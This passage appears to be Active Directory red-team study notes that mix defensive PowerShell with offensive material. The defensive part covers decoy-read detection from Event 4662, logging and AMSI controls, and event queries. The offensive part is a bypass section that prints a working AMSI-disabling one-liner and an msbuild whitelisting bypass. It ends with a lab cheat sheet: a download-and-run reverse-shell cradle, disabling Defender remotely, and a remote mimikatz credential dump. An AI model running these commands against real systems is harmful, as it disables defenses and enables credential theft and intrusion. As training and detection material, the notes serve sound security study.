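        Where-Object { $_.ObjectName -match $objectGuid -and
                       $_.Properties -match $PropertyGuid }
}

# Constructed sample 4662, trimmed to the fields used, so the parser can be
# exercised offline. The object GUID is a placeholder; the property GUID is real.
$sample = @"
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <EventID>4662</EventID>
    <TimeCreated SystemTime="2024-01-01T10:00:00.000Z"/>
  </System>
  <EventData>
    <Data Name="SubjectUserName">student1</Data>
    <Data Name="SubjectDomainName">dcorp</Data>
    <Data Name="SubjectLogonId">0x3e7</Data>
    <Data Name="ObjectName">%{11111111-2222-3333-4444-555555555555}</Data>
    <Data Name="Properties">%%7688
{bf967aba-0de6-11d0-a285-00aa003049e2}
{d07da11f-8a3d-42b6-b0aa-76c962be719a}</Data>
  </EventData>
</Event>
"@
$parsed = ConvertFrom-4662Event -Xml ([xml]$sample)
if ($parsed.Properties -match $X500UniqueIdentifierGuid) {
    "Sample: $($parsed.Subject) read x500uniqueIdentifier on $($parsed.ObjectName)"
}

# Live usage on a DC:
# Get-DecoyReadEvents -DecoySamAccountName 'usermanager-uncommon' |
#     Format-Table TimeCreated, Subject, LogonId -AutoSize
```

Broad enumeration (net user, Get-ADUser -Filter *) reads the default property set and will not match the property GUID filter, which is exactly the noise reduction the second decoy aims for.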

Detection and Defense - PowerShell
- Upgrade to Windows PowerShell 5.1 (Do not install PowerShell 6.0.0, it is PowerShell Core and does not support many security features of Windows PowerShell 5.1)
- Windows PowerShell 5 offers multiple security controls which certainly increase the costs to an attacker.

1. WhiteListing
- Use application control policies (Applocker) and Device Guard to restrict PowerShell scripts. If Applocker is configured in "Allow mode" for scripts, PowerShell 5 automatically uses the Constrained Language Mode.
- In the constrained language mode, all windows cmdlets and elements are allowed but only limited types are allowed. For eg: Add-Type, Win32 APIs, COM objects are not allowed.
- Both are supported by GPO, your mileage may vary according to your implementation preferences.

WhiteListing Bypasses
Please be mindful of whitelisting implementation. For eg, if powershell.exe is blocked, .NET code can use the System.Management.Automation namespace to load PowerShell functionality.
C:\Windows\Microsoft.NET\Framework\v4.0.30319 > msbuild.exe pshell.xml

2. Enhanced Logging
- PS v5 supports Enhanced Logging - script block logging and system-wide transcription.
- This allows Blue Teams to have a very in-depth look at an attacker's activities if he is using PowerShell.

A. System-wide Transcription
- Enables transcription (console logging) for everything (powershell.exe, PowerShell ISE, custom hosts - .NET DLL, msbuild, installutil etc.) which uses the PowerShell engine.
- Can be enabled using Group Policy (Administrative Templates -> Windows Components -> Windows PowerShell -> Turn on PowerShell transcription).
- By default, the transcripts are saved in the user's "My Documents" directory.
- HKLM:\Software\Policies\Microsoft\Windows\PowerShell\Transcription is the Registry key. Set EnableTranscripting to 1.

Cons of System-wide Transcription
- The transcripts are written as text files and can quickly grow in size because the command output is also recorded. It is always recommended to forward the transcripts to a log system to avoid tampering and running out of disk space.
- Enabling transcripts on a DC breaks the Active Directory Administration Centre (ADAC) GUI Application.

B. Script block logging
- Logs contents of all the script blocks processed by the PowerShell engine regardless of the host used.
- Can be enabled using Group Policy (Administrative Templates -> Windows Components -> Windows PowerShell -> Turn on PowerShell Script Block Logging).
- Logs to Microsoft-Windows-PowerShell/Operational
- By default, only the first execution of a script block is logged (verbose 4104). Set "Log script block invocation start / stop events" for start and stop of scripts in Event ID 4105 & 4106 (increases the no. of logs).
- HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging is the Registry key. Set EnableScriptBlockLogging to 1.
- PS v5 onwards logs some suspicious script blocks automatically based on a list of suspicious commands.
- It also records the original obfuscated code as well as the decoded and deobfuscated code.

Cons of Script Block logging
- Warning level script block logging checks only for a known list of suspicious commands.
- Large no. of logs for script block logging. Even more if invocation of script blocks is logged.
- Huge number of logs when module logging is enabled.

3. AMSI
- AMSI (Anti Malware Scan Interface) provides the registered antivirus access to the contents of a script before execution.
- This allows detection of malicious scripts regardless of input method (disk, encodedcommand, in-memory).
- Enabled by default on Windows 10 and supported by Windows Defender.
- Known problem: AMSI has no detection mechanism of its own. It is dependent on the signature based detection by the registered antivirus.

4. Constrained PowerShell
- Language mode in PowerShell is used to control access to different elements of a PowerShell session.
- In constrained language mode, all windows cmdlets and elements are allowed, but only limited types are allowed. For eg: Add-Type, Win32 APIs, COM objects are not allowed.
- Intended to work with Applocker in "Allow mode" or UMCI (Device Guard User Mode Code Integrity).
- When allow mode is set for scripts in Applocker, the constrained language mode kicks in by itself.
- Known problem: Not easy to implement enterprise-wide.

5. JEA
- JEA (Just Enough Administration) provides role based access control for PowerShell based remote delegated administration.
- With JEA, non-admin users can connect remotely to machines for doing specific tasks.
- Focused more on securing privileged access than solving a problem introduced with PowerShell.
- JEA endpoints have PowerShell transcription and logging enabled.

Bypasses
- Bypasses for the defenses discussed above can be categorized in the following categories:
* PowerShell downgrade to version 2
* Unloading, disabling or unsubscribing
* Obfuscation
* Trust Abuse (using trusted executables and code injection in trusted scripts)
- Many bypasses leave log entries which can be used to detect them.

1. Bypassing using PowerShell downgrade
- PS v2 lacks ALL of the detection mechanisms we discussed.
- PS v2 can be called using the -Version parameter or by using v2 reference assemblies.
- Version 2.0, 3.0 or 3.5 of the .NET framework is required to use PS v2.
- PS v2 Windows features must be enabled (enabled by default).
- This bypass leaves a log event ID 400 (which can be used for detection).

2. Bypassing Script Block Logging
- Can be bypassed for the current session without admin rights by disabling it from the Group Policy Cache, as discovered by Ryan Cobb.
- For efficiency, Group Policy settings are cached and used by PowerShell. It is possible to read and modify the settings.
- Taken from: https://cobbr.io/ScriptBlock-Logging-Bypass.html

3. Bypassing AMSI
- AMSI can be bypassed for the current session without admin rights by setting the amsiInitFailed field of System.Management.Automation.AmsiUtils.
- Tweeted by Matt Graeber
https://twitter.com/mattifestation/status/735261176745988096

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

4. Bypassing using Obfuscation
- Obfuscation defeats script block logging, warning level auto logging and AMSI when done right.
- As a very simple example, we have already seen how GetField becomes GetFiel`d to bypass warning level auto logging.
- Invoke-Obfuscation and Invoke-CradleCrafter from Daniel (https://github.com/danielbohannon) are very useful for implementing obfuscation.
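As an added example (not part of the CRTP material), the following PowerShell sets the two logging controls from section 2 through the registry keys named there, reports the current state, and then queries for the artifacts the bypasses above leave behind: Event ID 400 with EngineVersion=2.0 for the v2 downgrade, and Warning-level 4104 for the built-in suspicious-command list. The transcript directory is an assumption.

```powershell
# Added example (not part of the CRTP material): set the two logging controls
# above through the registry keys the notes name, then query for the artifacts
# the listed bypasses leave behind. Run elevated on the host being checked.
# Assumption: the transcript directory; point it at a forwarded/central share.

$SbPath = 'HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
$TrPath = 'HKLM:\Software\Policies\Microsoft\Windows\PowerShell\Transcription'

function Enable-PSLogging {
    param([string]$TranscriptDir = 'C:\PSTranscripts')   # assumed path
    foreach ($p in $SbPath, $TrPath) {
        if (-not (Test-Path $p)) { New-Item -Path $p -Force | Out-Null }
    }
    # Script block logging: one 4104 per new script block. Invocation
    # start/stop (4105/4106) stays off because of the log volume noted above.
    Set-ItemProperty -Path $SbPath -Name EnableScriptBlockLogging -Value 1 -Type DWord
    Set-ItemProperty -Path $SbPath -Name EnableScriptBlockInvocationLogging -Value 0 -Type DWord
    # System-wide transcription, written somewhere other than "My Documents".
    Set-ItemProperty -Path $TrPath -Name EnableTranscripting -Value 1 -Type DWord
    Set-ItemProperty -Path $TrPath -Name OutputDirectory -Value $TranscriptDir -Type String
}

function Get-PSLoggingState {
    # What the policy keys (GPO-delivered or local) currently say, plus the
    # language mode of this session (ConstrainedLanguage under Applocker allow mode).
    [pscustomobject]@{
        ScriptBlockLogging = (Get-ItemProperty $SbPath -ErrorAction SilentlyContinue).EnableScriptBlockLogging
        Transcription      = (Get-ItemProperty $TrPath -ErrorAction SilentlyContinue).EnableTranscripting
        LanguageMode       = $ExecutionContext.SessionState.LanguageMode
    }
}

function Get-PSDowngradeEvents {
    # Bypass 1 above leaves Event ID 400 in the "Windows PowerShell" log whose
    # message carries EngineVersion=2.0; a v5 engine start reports 5.x.
    param([datetime]$Since = (Get-Date).AddDays(-7))
    $filter = @{ LogName = 'Windows PowerShell'; Id = 400; StartTime = $Since }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'EngineVersion=2\.0' } |
        Select-Object TimeCreated, @{ n = 'HostApplication'; e = {
            if ($_.Message -match 'HostApplication=(.*)') { $Matches[1].Trim() } } }
}

function Get-SuspiciousScriptBlocks {
    # PS v5 writes script blocks that match its built-in suspicious-command
    # list at Warning level (3); this returns only those, not every verbose 4104.
    param([datetime]$Since = (Get-Date).AddDays(-7))
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104
                 Level = 3; StartTime = $Since }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, @{ n = 'ScriptBlockText'; e = { $_.Properties[2].Value } }
}

Get-PSLoggingState
Get-PSDowngradeEvents      | Format-Table -AutoSize
Get-SuspiciousScriptBlocks | Format-List
```

Enable-PSLogging is deliberately not called at the bottom; run it once per host (or deliver the same values by GPO) and forward both the Operational log and the transcript directory off the box, as the cons above recommend.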
1 Use -FullData wherever possible while performing enumeration using PowerView
2 Enumerate ACLs for all the GPOs
  Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}
3 Enumerate those GPOs where studentx or RDPUsers group have interesting permissions
  Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ?{$_.IdentityReference -match "student"}
4 Map all the trusts of the moneycorp.local forest
  Get-NetForestDomain -Verbose | Get-NetDomainTrust
5 Map all the external trusts
  Get-NetForestDomain -Verbose | Get-NetDomainTrust | ?{$_.TrustType -eq 'External'}
6 Map trusts of trusting forests
  Get-NetForestDomain -Forest eurocorp.local -Verbose | Get-NetDomainTrust
7 Find the group of our foothold user and try to give that groupname as parameter to Invoke-UserHunter
8 PowerShell Reverse shell listener
  powershell iex (iwr http://172.16.100.131/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100
9 Turn off defender and AV protection and disable AMSI on Remote machine
  Invoke-Command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
10 Dump creds from LSA using mimikatz after loading it in memory of a remote machine
  Invoke-Command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess
11 Login to a machine using a particular account
  Enter-PSSession -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Credential dcorp\Administrator
